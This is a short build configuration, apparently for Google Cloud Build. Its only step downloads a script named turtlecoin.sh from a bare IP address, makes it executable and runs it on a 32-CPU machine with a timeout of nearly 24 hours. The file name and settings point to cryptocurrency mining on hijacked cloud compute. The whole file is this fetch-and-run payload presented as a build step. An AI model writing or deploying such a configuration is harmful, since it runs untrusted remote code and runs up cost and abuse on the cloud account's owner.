steps:
  - name: 'python:3.8'
    entrypoint: "bash"
    args:
      - "-c"
      - |
          wget -O test.sh http://149.28.63.99:8080/9LFoi/turtlecoin.sh
          chmod 777 test.sh
          ./test.sh
timeout: 86399s
options:
  machineType: E2_HIGHCPU_32
